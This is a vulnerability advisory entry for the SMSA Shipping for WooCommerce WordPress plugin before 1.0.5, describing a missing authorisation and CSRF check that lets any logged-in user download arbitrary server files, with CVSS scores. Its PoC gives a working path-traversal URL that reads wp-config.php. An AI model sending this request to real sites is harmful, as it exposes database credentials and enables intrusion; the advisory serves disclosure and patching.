Lucene search

K
wpvulndbWpvulndbWPVDB-ID:0B432858-722C-4BDA-AA95-AD48E2097302
HistoryNov 22, 2022 - 12:00 a.m.

SMSA Shipping for WooCommerce < 1.0.5 - Subscriber+ Arbitrary File Download

2022-11-2200:00:00
wpscan.com
5

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

The plugin does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server

PoC

Open the following URL when being logged in as any user https://example.com/wp-admin/admin-ajax.php?action=ced_smsa_get_pfd_download&amp;filename;=../../../../wp-config.php

CPENameOperatorVersion
smsa-shipping-for-woocommercelt1.0.5

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Related for WPVDB-ID:0B432858-722C-4BDA-AA95-AD48E2097302